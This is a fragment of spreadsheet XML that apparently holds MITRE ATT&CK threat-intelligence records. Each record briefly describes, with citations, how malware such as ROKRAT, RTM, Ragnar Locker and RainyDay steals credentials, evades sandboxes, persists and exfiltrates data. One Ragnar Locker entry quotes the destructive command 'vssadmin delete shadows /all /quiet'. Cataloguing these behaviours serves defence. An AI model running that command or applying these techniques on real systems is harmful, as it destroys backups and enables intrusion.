    <t>[RGDoor](https://attack.mitre.org/software/S0258) uses HTTP for C2 communications.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>relationship--4e95e37e-76a0-498e-b46e-73a4fb639d3a</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) uses cmd.exe to execute commands on the victim’s machine.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>relationship--2d467445-9cce-4e84-968e-7a7ecc0a81fa</t>
  </si>
  <si>
    <t>[APT12](https://attack.mitre.org/groups/G0005) has used the [RIPTIDE](https://attack.mitre.org/software/S0003) RAT, which communicates over HTTP with a payload encrypted with RC4.(Citation: Moran 2014)</t>
  </si>
  <si>
    <t>relationship--c945e5f2-5622-46ce-8b35-468d41d2af46</t>
  </si>
  <si>
    <t>[APT12](https://attack.mitre.org/groups/G0005) has used [RIPTIDE](https://attack.mitre.org/software/S0003), a RAT that uses HTTP to communicate.(Citation: Moran 2014)</t>
  </si>
  <si>
    <t>relationship--c4ce39f8-371c-45dd-a8d2-a411a6f0678d</t>
  </si>
  <si>
    <t>[ROADTools](https://attack.mitre.org/software/S0684) automatically gathers data from Azure AD environments using the Azure Graph API.(Citation: Roadtools)</t>
  </si>
  <si>
    <t>relationship--34efccbe-b184-444d-8ce3-3a3e2bc2f988</t>
  </si>
  <si>
    <t>[ROADTools](https://attack.mitre.org/software/S0684) can enumerate Azure AD users.(Citation: Roadtools)</t>
  </si>
  <si>
    <t>relationship--51046675-9dcd-416e-a43d-09ae7d589a18</t>
  </si>
  <si>
    <t xml:space="preserve">[ROADTools](https://attack.mitre.org/software/S0684) leverages valid cloud credentials to perform enumeration operations using the internal Azure AD Graph API.(Citation: Roadtools)	</t>
  </si>
  <si>
    <t>relationship--64fe5b69-1b3b-44a3-a952-0dc22091ea3a</t>
  </si>
  <si>
    <t xml:space="preserve">[ROADTools](https://attack.mitre.org/software/S0684) can enumerate Azure AD groups.(Citation: Roadtools)	</t>
  </si>
  <si>
    <t>relationship--5b550a59-f036-4a4e-87f8-2125d2fe7c11</t>
  </si>
  <si>
    <t xml:space="preserve">[ROADTools](https://attack.mitre.org/software/S0684) can enumerate Azure AD applications and service principals.(Citation: Roadtools)	</t>
  </si>
  <si>
    <t>relationship--3c9a5581-9199-4612-8840-06844b23cd1d</t>
  </si>
  <si>
    <t>[ROADTools](https://attack.mitre.org/software/S0684) can enumerate Azure AD systems and devices.(Citation: Roadtools)</t>
  </si>
  <si>
    <t>relationship--0b2d53db-2f5c-4dc7-97de-f0c12e22472c</t>
  </si>
  <si>
    <t>[ROCKBOOT](https://attack.mitre.org/software/S0112) is a Master Boot Record (MBR) bootkit that uses the MBR to establish persistence.(Citation: FireEye Bootkits)</t>
  </si>
  <si>
    <t>relationship--44b56e08-7cd1-442c-8806-c69bb65fd231</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can use  the `GetForegroundWindow` and `GetWindowText` APIs to discover where the user is typing.(Citation: Talos ROKRAT)</t>
  </si>
  <si>
    <t>relationship--d1285ef9-fb7b-4d9b-9915-0b033e768a52</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) has an audio capture and eavesdropping module.(Citation: Securelist ScarCruft May 2019)</t>
  </si>
  <si>
    <t>relationship--0e8f2301-2758-43b3-8b3e-615281100eff</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</si>
  <si>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</si>
  <si>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relationship--b45c7b78-55c7-4418-ab03-9f805de7376d</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can extract clipboard data from a compromised host.(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>relationship--83f5442e-74c1-4e7b-83d8-9c254543bbac</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can steal credentials stored in Web browsers by querying the sqlite database.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>relationship--352953e9-c1ca-4d25-84b6-eb05a012b2e9</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can collect host data and specific file types.(Citation: NCCGroup RokRat Nov 2018)(Citation: Volexity InkySquid RokRAT August 2021)(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>relationship--d1a17f31-c62f-4ec3-9a77-41e6a339a657</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can check for debugging tools.(Citation: Talos Group123)(Citation: NCCGroup RokRat Nov 2018)(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>relationship--4eb00375-3ee3-43c7-845a-2206e1eff114</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can decrypt strings using the victim's hostname as the key.(Citation: Volexity InkySquid RokRAT August 2021)(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>relationship--959092cf-5647-4c25-b64e-3e84061511a5</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) relies on a specific victim hostname to execute and decrypt important strings.(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>relationship--78617eb0-f679-48ad-82ca-3a85d0f9371e</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can send collected files back over same C2 channel.(Citation: Talos ROKRAT)</t>
  </si>
  <si>
    <t>relationship--7ccf3e90-8099-4445-b39f-956d2807189b</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can send collected data to cloud storage services such as PCloud.(Citation: Malwarebytes RokRAT VBA January 2021)(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>relationship--d7d9a45b-0f61-43a0-93fd-7924c9307f72</t>
  </si>
  <si>
    <t xml:space="preserve">[ROKRAT](https://attack.mitre.org/software/S0240) can request to delete files.(Citation: NCCGroup RokRat Nov 2018)	</t>
  </si>
  <si>
    <t>relationship--53c8de3e-f862-44d5-be7e-274e14bdd57e</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) has the ability to gather a list of files and directories on the infected system.(Citation: Securelist ScarCruft May 2019)(Citation: NCCGroup RokRat Nov 2018)(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>relationship--90be71e4-6b38-4411-aac5-09711a334393</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can retrieve additional malicious payloads from its C2 server.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)(Citation: Volexity InkySquid RokRAT August 2021)(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>relationship--921b3245-0795-40cd-82e1-04f38bc42b14</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can use  `SetWindowsHookEx` and `GetKeyNameText` to capture keystrokes.(Citation: Talos ROKRAT)(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>relationship--366c4cf9-7ea1-4751-9415-bcd3a1c52b27</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) has relied upon users clicking on a malicious attachment delivered through spearphishing.(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>relationship--d764b3d2-8ca3-437b-abe4-f54662ccce42</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can modify the `HKEY_CURRENT_USER\Software\Microsoft\Office\` registry key so it can bypass the VB object model (VBOM) on a compromised host.(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>relationship--0ae212be-c07b-4f62-8c5e-9dfc0472254e</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can use a variety of API calls to execute shellcode.(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>relationship--44b2a372-1aee-4a7e-a544-2aacdfe3121a</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can encrypt data prior to exfiltration by using an RSA public key.(Citation: Volexity InkySquid RokRAT August 2021)(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>relationship--8a41eff0-83f3-414a-af49-54f0f8c1b84a</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can list the current running processes on the system.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>relationship--536ed2f4-46c5-4485-998c-60f0480d5c21</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can use `VirtualAlloc`, `WriteProcessMemory`, and then `CreateRemoteThread` to execute shellcode within the address space of `Notepad.exe`.(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>relationship--cc470da4-82b7-4efb-aa09-f3e7402291df</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can access the &lt;code&gt;HKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosData&lt;/code&gt; Registry key to obtain the System manufacturer value to identify the machine type.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>relationship--2de4d7df-18fc-4202-93ee-2fcfe6f2e501</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</si>
  <si>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</si>
  <si>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relationship--c4f662d6-7e47-4161-bf8d-dd445ae901b1</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) has been delivered via spearphishing emails that contain a malicious Hangul Office or Microsoft Word document.(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>relationship--8328f7af-8b66-45fd-89dc-2833fa37af23</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can check for VMware-related files and DLLs related to sandboxes.(Citation: Talos Group123)(Citation: NCCGroup RokRat Nov 2018)(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>relationship--8bbe5f67-f65e-4982-8897-7f7466fc0845</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</si>
  <si>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</si>
  <si>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relationship--cfc92bbe-4a8b-47ec-b12d-d08fdcea1fbb</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can collect the username from a compromised host.(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>relationship--c78a0329-8160-40d2-83f4-f5076671e786</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) has used Visual Basic for execution.(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>relationship--68a15e63-2f89-4828-8be3-4494d7ff36e3</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can use HTTP and HTTPS for command and control communication.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>relationship--f22106b0-ca8c-45ad-b20c-5a5ddd7bf886</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can steal credentials by leveraging the Windows Vault mechanism.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>relationship--6f3b9887-80cb-4b36-b228-91e360d83962</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>relationship--a83182d2-b619-4ca4-984b-21ecfe43da26</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can attempt to run the program as admin, then show a fake error message and a legitimate UAC bypass prompt to the user in an attempt to socially engineer the user into escalating privileges.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>relationship--0d0b4507-b600-41f1-be98-03909e5d99cf</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has the ability to remove Registry entries that it created for persistence.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>relationship--f7873bae-95b2-4463-808f-8f9d5c9deb8e</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) collects data from the clipboard.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>relationship--1e03e95c-1c9a-4fa8-9d6d-b5d244b06509</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) samples have been signed with a code-signing certificates.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>relationship--6b0b404e-7e1b-4f8f-8b78-85016f36f8e9</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</si>
  <si>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</si>
  <si>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relationship--954c6284-d1eb-48f1-96a4-1ed81b063d82</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can search for specific strings within browser tabs using a Dynamic Data Exchange mechanism.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>relationship--6975d10a-91bf-4a22-8353-745de444c594</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</si>
  <si>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</si>
  <si>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relationship--25eb9cd3-80e1-4116-bfd3-fa3819dc2079</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can delete all files created during its execution.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>relationship--fe4ed27a-6d45-4e6a-bbc0-7ebe15a38046</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can check for specific files and directories associated with virtualization and malware analysis.(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>relationship--d412ff4a-d9d0-44a9-b8b3-36a650f18036</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can download additional files.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>relationship--c839344c-a96d-412f-bded-5ac7c8fd446a</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can add a certificate to the Windows store.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>relationship--af74c0ec-0bbe-4538-a3a3-1e967afd3d51</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can record keystrokes from both the keyboard and virtual keyboard.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>relationship--23e2dc58-4b8d-48d8-82fd-d051892a7d58</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has relied on users opening malicious email attachments, decompressing the attached archive, and double-clicking the executable within.(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>relationship--e0b775d4-cfc4-4075-a72b-6a866ef3c159</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has named the scheduled task it creates "Windows Update".(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>relationship--874d4046-5b9a-4f60-88f4-79ae63a70a1e</t>
  </si>
  <si>
    <t xml:space="preserve">[RTM](https://attack.mitre.org/software/S0148) has been delivered as archived Windows executable files masquerading as PDF documents.(Citation: Unit42 Redaman January 2019)	</t>
  </si>
  <si>
    <t>relationship--f981c633-9333-4c7d-a168-7bea28f64d52</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can delete all Registry entries created during its execution.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>relationship--94b4de9a-1f83-4923-8d4b-e9bafdb1bef9</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can use the &lt;code&gt;FindNextUrlCacheEntryA&lt;/code&gt; and &lt;code&gt;FindFirstUrlCacheEntryA&lt;/code&gt; functions to search for specific strings within browser history.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>relationship--9ae8ed36-348a-4053-bfa2-81fd0cc774aa</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) used Port 44443 for its VNC module.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>relationship--b2848d62-76a1-465c-b12e-7dc3113e6bbe</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</si>
  <si>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</si>
  <si>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relationship--d5c86dd3-3cfa-4ade-8984-fdf079b9f81b</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain a list of smart card readers attached to the victim.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>relationship--45f9e4b6-a6a0-4f9f-aae9-9e8a69f5681d</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain information about process integrity levels.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>relationship--f0cf3ea2-5345-48d7-9685-be0180eb0e4a</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) tries to add a Registry Run key under the name "Windows Update" to establish persistence.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>relationship--37dd9a3c-dd52-4541-be7c-b490d026305c</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has the capability to download a VNC module from command and control (C2).(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>relationship--14e8774f-a443-4065-b44d-5bb13b467c7c</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) runs its core DLL file using rundll32.exe.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>relationship--b258b8da-ddd2-4f0e-b5da-83a89f018d54</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) tries to add a scheduled task to establish persistence.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>relationship--84e0c62b-b1a6-4ecd-8607-f0b516cb48f6</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can capture screenshots.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>relationship--f6d23c00-158e-4e39-bf9b-f18344cd0151</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain information about security software on the victim.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>relationship--d7903e1f-f31c-48bc-b7c3-3616cb1a792f</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can scan victim drives to look for specific banking software on the machine to determine next actions.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>relationship--f60ed279-c720-4906-9e63-3cd7ce49e1e0</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has been delivered via spearphishing attachments disguised as PDF documents.(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>relationship--2b948c49-f65d-4e60-969f-229030b4d311</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) encrypts C2 traffic with a custom RC4 variant.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>relationship--87fb2671-e71a-4630-bde2-67e546fdeaa6</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain the computer name, OS version, and default language identifier.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>relationship--c6606ced-4641-451f-ac2a-493b1d15d0aa</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain the victim username and permissions.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>relationship--aad1cfa0-0df0-4768-87c2-5e59da2c5e44</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain the victim time zone.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>relationship--4c3890f0-378d-4cef-8db7-0258161ff3f7</t>
  </si>
  <si>
    <t xml:space="preserve">[RTM](https://attack.mitre.org/software/S0148) can detect if it is running within a sandbox or other virtualized analysis environment.(Citation: Unit42 Redaman January 2019)	</t>
  </si>
  <si>
    <t>relationship--73d5e6ab-9d0c-4884-9db0-02033523e61a</t>
  </si>
  <si>
    <t xml:space="preserve">[RTM](https://attack.mitre.org/software/S0148) has initiated connections to external domains using HTTPS.(Citation: Unit42 Redaman January 2019)	</t>
  </si>
  <si>
    <t>relationship--b1c26420-ee32-44db-9158-781d38d7cc3b</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) uses the command line and rundll32.exe to execute.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>relationship--1ca68d88-a287-4c48-a4f8-68611eceb445</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) encrypts files on the local machine and mapped drives prior to displaying a note demanding a ransom.(Citation: Sophos Ragnar May 2020)(Citation: Cynet Ragnar Apr 2020)</t>
  </si>
  <si>
    <t>relationship--05951058-e8d4-4ace-a6b8-54735c6a4769</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has attempted to terminate/stop processes and services associated with endpoint security products.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>relationship--ca33387d-495a-460a-86da-d5f8d8adda31</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) can delete volume shadow copies using &lt;code&gt;vssadmin delete shadows /all /quiet&lt;/code&gt;.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>relationship--06dd311f-393f-4c24-beee-19d690ae4ba2</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has been delivered as an unsigned MSI package that was executed with &lt;code&gt;msiexec.exe&lt;/code&gt;.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>relationship--bf5b23c2-9b65-4909-ae6c-21b8ccadd930</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) may attempt to connect to removable drives and mapped network drives.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>relationship--ea79bf34-c1ba-4523-879f-441d6a4a9e5e</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used regsvr32.exe to execute components of VirtualBox.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>relationship--af1edc78-f0b2-450c-b91f-fe1646589173</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</si>
  <si>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</si>
  <si>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relationship--913c67d5-0c5b-40d5-be88-6ce4e5030603</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used rundll32.exe to execute components of VirtualBox.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>relationship--e22af0ee-ab7a-4989-9077-fe538a3ad03d</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used sc.exe to execute a service that it creates.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>relationship--347de212-26bf-4ad4-963f-c4dfa3c821d1</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has attempted to stop services associated with business applications and databases to release the lock on files used by these applications so they may be encrypted.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>relationship--9212f940-021e-49b1-b500-fa1dd76b7132</t>
  </si>
  <si>
    <t>Before executing malicious code, [Ragnar Locker](https://attack.mitre.org/software/S0481) checks the Windows API &lt;code&gt;GetLocaleInfoW&lt;/code&gt; and doesn't encrypt files if it finds a former Soviet country.(Citation: FBI Ragnar Locker 2020)</t>
  </si>
  <si>
    <t>relationship--93fdbd36-b577-44bd-b4db-6daadbef9cb2</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used cmd.exe and batch scripts to execute commands.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>relationship--3a20bdab-0c73-49be-a8b5-630787814773</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used sc.exe to create a new service for the VirtualBox driver.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>relationship--b7573d56-3acb-464f-b63b-3734af37ad42</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</si>
  <si>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</si>
  <si>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relationship--ff10b414-cc17-4335-9030-1262e5401b39</t>
  </si>
  <si>
    <t>19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</si>
  <si>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</si>
  <si>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relationship--288d8f70-d2af-44f8-86c9-fb8c2cd5103f</t>
  </si>
  <si>
    <t>21 January 2021</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) was installed under names that resembled legitimate Windows file and directory names.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>relationship--4a942244-9b88-43d0-9a1c-c0277e7903e8</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) encrypted its payload using a simple XOR algorithm with a single-byte key.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>relationship--03cd94c9-73aa-4eed-b724-629d180e3002</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) used a custom packer for its [Cobalt Strike](https://attack.mitre.org/software/S0154) payload, which was compressed using the LZMA algorithm.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>relationship--1c8951ff-5de9-4842-b889-0c439aa76e8f</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) used steganography to locate the start of its encoded payload within legitimate 7-Zip code.(Citation: Symantec RAINDROP January 2021)</t>
  </si>
  <si>
    <t>relationship--c6572007-a3f6-40d1-bfd2-37abf6a63b58</t>
  </si>
  <si>
    <t>After initial installation, [Raindrop](https://attack.mitre.org/software/S0565) runs a computation to delay execution.(Citation: Symantec RAINDROP January 2021)</t>
  </si>
  <si>
    <t>relationship--00701b4a-9eab-41cc-9c09-f904a9799201</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use tools to collect credentials from web browsers.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--70166ae9-63ec-4d74-be69-ec42a39c239c</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use side-loading to run malicious executables.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--eb6ffb36-38cf-44d9-aaba-7c551b099d65</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use a file exfiltration tool to collect recently changed files on a compromised host.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--ecbe6cc7-16cc-474f-91fe-bd3e9014abbf</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can decrypt its payload via a XOR key.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--2e2e3a71-51b6-4779-a376-a9cc2750b5da</t>
  </si>
  <si>
    <t xml:space="preserve">[RainyDay](https://attack.mitre.org/software/S0629) can use a file exfiltration tool to upload specific files to Dropbox.(Citation: Bitdefender Naikon April 2021)	 
</t>
  </si>
  <si>
    <t>relationship--1bcc7bc4-29ab-4e27-8b9e-e7c51343148e</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) has the ability to switch between TCP and HTTP for C2 if one method is not working.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--8492aff7-1171-4805-9052-3decdd677c94</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) has the ability to uninstall itself by deleting its service and files.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--16b2871e-c793-4362-89b8-b893806d147a</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use a file exfiltration tool to collect recently changed files with specific extensions.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--ad3f239b-8a48-40dd-aa07-71fddb19e275</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can download files to a compromised host.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--2d3a8912-53fd-416b-bef8-f6ad980ae7c0</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) can use a file exfiltration tool to copy files to &lt;code&gt;C:\ProgramData\Adobe\temp&lt;/code&gt; prior to exfiltration.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--6b9d6a84-b73e-4fb3-ad86-64b5832056d4</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) has named services and scheduled tasks to appear benign including "ChromeCheck" and "googleupdate."(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--3922a8b2-5a5d-4822-be22-75f246d56fa4</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) has used names to mimic legitimate software including "vmtoolsd.exe" to spoof Vmtools.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--0529ea16-1644-455d-a682-27e1f04b8cd1</t>
  </si>
  <si>
    <t>The file collection tool used by [RainyDay](https://attack.mitre.org/software/S0629) can utilize native API including &lt;code&gt;ReadDirectoryChangeW&lt;/code&gt; for folder monitoring.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--09505cc8-8e0f-4283-9329-df2bea12867c</t>
  </si>
  <si>
